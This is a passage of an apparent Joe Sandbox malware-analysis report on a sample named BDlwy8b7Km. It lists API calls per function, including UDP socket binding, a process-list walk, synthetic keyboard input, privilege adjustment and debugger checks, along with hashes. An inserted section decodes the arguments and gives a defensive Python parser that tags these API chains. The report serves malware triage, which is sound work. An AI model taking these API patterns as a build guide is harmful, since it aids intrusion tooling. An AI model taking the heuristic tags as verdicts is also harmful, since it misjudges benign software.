                                                  • Instruction Fuzzy Hash: 73414F7194460A9FDF18DF64C849AEFBBBAFF55310F244159E805A2291EB309E45CF60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 14100214100a14100814100b14100514100514100f14100c14100514100214100f14100f1410091410051410081410081410001410001410001410001410001410$ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-2091794240
                                                  • Opcode ID: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
                                                  • Instruction ID: d1858e9d2966cd0bf040140332f1031adac44e773e6337853f188bc723f6a1ff
                                                  • Opcode Fuzzy Hash: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
                                                  • Instruction Fuzzy Hash: 60A26C75A0061ACBDF34CF58C8407BEBBB1BB55314F2485ABE815AB385EB349D85CB90
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 005A9A4E
                                                  • GetSysColor.USER32(0000000F), ref: 005A9B23
                                                  • SetBkColor.GDI32(?,00000000), ref: 005A9B36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$LongProcWindow
                                                  • String ID:
                                                  • API String ID: 3131106179-0
                                                  • Opcode ID: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
                                                  • Instruction ID: 56e44f7cd726ab21e4c73f14da11cb5141e8145d0e98fb9326d77b3262e18612
                                                  • Opcode Fuzzy Hash: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
                                                  • Instruction Fuzzy Hash: CCA118701084B8BFE72CAA3D9C48E7F2E9EFBCB344F14460AF542DA591CA259D01D676
                                                  APIs
                                                    • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                    • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0061185D
                                                  • WSAGetLastError.WSOCK32 ref: 00611884
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006118DB
                                                  • WSAGetLastError.WSOCK32 ref: 006118E6
                                                  • closesocket.WSOCK32(00000000), ref: 00611915
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 1601658205-0
                                                  • Opcode ID: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
                                                  • Instruction ID: 2c59d74b4bf448e15a0930fbffced8ef56444ddb9ffe7b28ebd06b501ae4e13b
                                                  • Opcode Fuzzy Hash: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
                                                  • Instruction Fuzzy Hash: D651C671A002109FDB10AF24C88AF6E7BE6AB89718F08C458F9155F3D3D771ED428BA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
                                                  • Instruction ID: ed76665774a29b9cbace9124beb2c85e2998563261cb52c8b64998d7b953d7c4
                                                  • Opcode Fuzzy Hash: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
                                                  • Instruction Fuzzy Hash: 1121D635744A215FD7208F1AE854B6A7BE6FFA6324B198068E8458F351C775EC42CF90
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005F82AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($tbe$|
                                                  • API String ID: 1659193697-2251899736
                                                  • Opcode ID: 87c27a0497a307890cf47b7297536578b24e0a6d0da304c1b33fad1092702f89
                                                  • Instruction ID: f930b2a4645803332efc36b8ac4d6ce8f1427d64529d6677edb52d23c2480c63
                                                  • Opcode Fuzzy Hash: 87c27a0497a307890cf47b7297536578b24e0a6d0da304c1b33fad1092702f89
                                                  • Instruction Fuzzy Hash: 13323775A006059FCB28CF59C481A7ABBF0FF48710B15C96EE59ADB3A1EB74E941CB40
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0061A6AC
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0061A6BA
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0061A79C
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061A7AB
                                                    • Part of subcall function 005ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D3303,?), ref: 005ACE8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                  • String ID:
                                                  • API String ID: 1991900642-0
                                                  • Opcode ID: fcbfda357a480b4c76f4b05450d96c8e6474ecd009e1164555dcf898ffc68267
                                                  • Instruction ID: ff86f9c22814b1e9f28664dffacada08c9dd0f8151d30f69fd418f994c8af76a
                                                  • Opcode Fuzzy Hash: fcbfda357a480b4c76f4b05450d96c8e6474ecd009e1164555dcf898ffc68267
                                                  • Instruction Fuzzy Hash: 4E512871508301AFD710EF64C88AA6BBBE9FFC9754F44492DF58997291EB30D904CB92
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 005FAAAC
                                                  • SetKeyboardState.USER32(00000080), ref: 005FAAC8
                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 005FAB36
                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 005FAB88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
                                                  • Instruction ID: 84c48138a1a355aaa2d28d1d24c184043c76a572bc3726ec9c67289f746d15fe
                                                  • Opcode Fuzzy Hash: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
                                                  • Instruction Fuzzy Hash: A131E7B0A8064CAEFB358B64CC05BFA7FAABB44320F04461AE689561D1D77D8985C763
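The per-function rows above (socket/bind, the Toolhelp32 process walk with CompareStringW, GetKeyboardState/PostMessageW/SendInput) are what a triager reads first in this part of the report, and the raw arguments carry more than the API names do: socket(00000002,00000002,00000011) decodes to AF_INET=2, SOCK_DGRAM=2, IPPROTO_UDP=0x11, so bind() attaches a UDP socket; the 00000102 in PostMessageW is WM_CHAR; the 0000001C passed to SendInput is sizeof(INPUT) on 32-bit Windows; and CompareStringW(00000409,00000001,...) compares with LCID 0x409 (en-US) and NORM_IGNORECASE. As an added example, not part of the Joe Sandbox report or its IDA plugin, the Python below parses entries in exactly this text format into records and tags a few such chains. The rule set and tag names are my own heuristics; the sample text is three entries copied from this report with the Memory Dump Source rows trimmed.

```python
"""Parse Joe Sandbox per-function API rows (this report's format) and tag notable API chains."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Matches "• bind.WSOCK32(00000000,?,00000010), ref: 006118DB" and the indented
# "• Part of subcall function 0061304E: inet_addr.WSOCK32(...), ref: 0061307A" form.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw hex / "?" tokens exactly as Joe Sandbox prints them
    ref: str                   # call-site address
    subcall_of: Optional[str]  # callee address for "Part of subcall function" rows, else None

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    instruction_id: str = ""

    def api_names(self):
        return {c.api for c in self.calls}

def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per block; the 'Instruction Fuzzy Hash' row closes a block."""
    entries, cur, in_apis = [], FunctionEntry(), False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            in_apis = True
        elif s.startswith("• Instruction ID:"):
            cur.instruction_id = s.split(":", 1)[1].strip()
        elif s.startswith("• Instruction Fuzzy Hash:"):
            entries.append(cur)
            cur, in_apis = FunctionEntry(), False
        elif in_apis:
            m = API_LINE.match(line)
            if m is None:          # "Strings" / "Memory Dump Source" ends the API list
                in_apis = False
                continue
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     m.group("ref"), m.group("sub")))
    return entries

def triage(entry: FunctionEntry) -> List[Tuple[str, str]]:
    """(tag, note) pairs for API chains a triager would open first. Heuristics, not verdicts."""
    names, hits = entry.api_names(), []
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= names \
            and names & {"CompareStringW", "lstrcmpiW", "lstrcmpW"}:
        hits.append(("process-name-check", "walks the process list and compares names"))
    if names & {"SendInput", "keybd_event", "mouse_event"}:
        hits.append(("synthetic-input", "injects keyboard/mouse events"))
    for c in entry.calls:
        # socket(AF_INET=2, SOCK_DGRAM=2, IPPROTO_UDP=0x11) with a bind() in the same function
        if c.api == "socket" and c.args[:3] == ["00000002", "00000002", "00000011"] and "bind" in names:
            hits.append(("udp-bind", "binds a UDP socket, call site " + c.ref))
        # PostMessageW(hwnd, WM_CHAR=0x0102, ...) types a character into a target window
        if c.api == "PostMessageW" and len(c.args) > 1 and c.args[1] == "00000102":
            hits.append(("wm_char-inject", "posts WM_CHAR to a window, call site " + c.ref))
    return hits

# Three entries copied from this report; the Memory Dump Source rows are trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0061185D
• WSAGetLastError.WSOCK32 ref: 00611884
• bind.WSOCK32(00000000,?,00000010), ref: 006118DB
Memory Dump Source
• Instruction ID: 2c59d74b4bf448e15a0930fbffced8ef56444ddb9ffe7b28ebd06b501ae4e13b
• Instruction Fuzzy Hash: D651C671A002109FDB10AF24C88AF6E7BE6AB89718F08C458F9155F3D3D771ED428BA1
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0061A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 0061A6BA
• Process32NextW.KERNEL32(00000000,?), ref: 0061A79C
• CloseHandle.KERNEL32(00000000), ref: 0061A7AB
  • Part of subcall function 005ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D3303,?), ref: 005ACE8A
Memory Dump Source
• Instruction ID: ff86f9c22814b1e9f28664dffacada08c9dd0f8151d30f69fd418f994c8af76a
• Instruction Fuzzy Hash: 4E512871508301AFD710EF64C88AA6BBBE9FFC9754F44492DF58997291EB30D904CB92
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 005FAAAC
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 005FAB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 005FAB88
Memory Dump Source
• Instruction ID: 84c48138a1a355aaa2d28d1d24c184043c76a572bc3726ec9c67289f746d15fe
• Instruction Fuzzy Hash: A131E7B0A8064CAEFB358B64CC05BFA7FAABB44320F04461AE689561D1D77D8985C763
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.instruction_id[:16], [tag for tag, _ in triage(e)])
```

Run stand-alone it prints one line per entry with its tags (udp-bind, process-name-check, synthetic-input plus wm_char-inject). The tags are leads, not verdicts: a process walk that compares names, a WM_CHAR/SendInput keystroke routine or a bound UDP socket is also what a script interpreter's built-ins compile to, so the next step is to open the call site in the dump and see which string reaches CompareStringW and which window handle receives the WM_CHAR, rather than scoring the function on the API names alone.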
                                                  APIs
                                                  • _free.LIBCMT ref: 005CBB7F
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • GetTimeZoneInformation.KERNEL32 ref: 005CBB91
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,0066121C,000000FF,?,0000003F,?,?), ref: 005CBC09
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,00661270,000000FF,?,0000003F,?,?,?,0066121C,000000FF,?,0000003F,?,?), ref: 005CBC36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                  • String ID:
                                                  • API String ID: 806657224-0
                                                  • Opcode ID: e26dfcbba4dfd98454fec05fa9a4b1dc95a3dfe8edc724d17f364d7ca5fe20f9
                                                  • Instruction ID: c741db5d8625fcc78c4a28f5e26216ad5dcf5f444229775cb6cfb9b5351ef94a
                                                  • Opcode Fuzzy Hash: e26dfcbba4dfd98454fec05fa9a4b1dc95a3dfe8edc724d17f364d7ca5fe20f9
                                                  • Instruction Fuzzy Hash: 9131E170904246DFDB10DFA9CC92A2DBFB9FF46710B18466EE020DB2A1C7709E80DB50
                                                  APIs
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 0060CE89
                                                  • GetLastError.KERNEL32(?,00000000), ref: 0060CEEA
                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 0060CEFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventFileInternetLastRead
                                                  • String ID:
                                                  • API String ID: 234945975-0
                                                  • Opcode ID: f9ff5452f2ae1758de5d7f27d9750bd39a684b11ea42b823634ec69628288826
                                                  • Instruction ID: 55235b9cbe270f95806d66052e41804ed9eb220a6c7058f934bab7dacce7a914
                                                  • Opcode Fuzzy Hash: f9ff5452f2ae1758de5d7f27d9750bd39a684b11ea42b823634ec69628288826
                                                  • Instruction Fuzzy Hash: 4421BDB15407069BD734CF65C948BEB7BFAEF40324F20462EE646D2291E770EE059B60
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 005C271A
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005C2724
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 005C2731
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
                                                  • Instruction ID: 6bb3a728377d4c8762588abaedc212914e6760a396c4cd5083b5cc6259e67f5f
                                                  • Opcode Fuzzy Hash: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
                                                  • Instruction Fuzzy Hash: 5831C4749012199BCB21DF68DC88BDDBBB8FF08310F5055EAE41CA62A1E7309F818F44
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 006051DA
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00605238
                                                  • SetErrorMode.KERNEL32(00000000), ref: 006052A1
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  APIs
                                                    • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                                                    • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                  • GetLastError.KERNEL32 ref: 005F174A
                                                  Similarity
                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                  • String ID:
                                                  • API String ID: 577356006-0
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD608
                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005FD645
                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD650
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                  • String ID:
                                                  • API String ID: 33631002-0
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005F168C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005F16A1
                                                  • FreeSid.ADVAPI32(?), ref: 005F16B1
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D09
                                                  • TerminateProcess.KERNEL32(00000000,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D10
                                                  • ExitProcess.KERNEL32 ref: 005B4D22
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 005ED28C
                                                  Strings
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID: X64
                                                  • API String ID: 2645101109-893830106
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable is not of type 'Object'.$p#f
                                                  • API String ID: 0-4110578496
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00606918
                                                  • FindClose.KERNEL32(00000000), ref: 00606961
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037E4
                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037F4
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  APIs
                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 005FB25D
                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 005FB270
                                                  Similarity
                                                  • API ID: InputSendkeybd_event
                                                  • String ID:
                                                  • API String ID: 3536248340-0
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
                                                  • CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: d3abd2bf40052c691fdc39cd4a4a8714710eaeed214515807723ae7efb56be33
                                                  • Instruction ID: 61899273c8b19c78e36c938eb618fd379a62f5a6d89ec88130281cc1609964cb
                                                  • Opcode Fuzzy Hash: d3abd2bf40052c691fdc39cd4a4a8714710eaeed214515807723ae7efb56be33
                                                  • Instruction Fuzzy Hash: A3E04F32004A01EFE7352B61FC09E7B7BEDFB04320B20882DF5A5804B1DB626CA1DB54
                                                  APIs
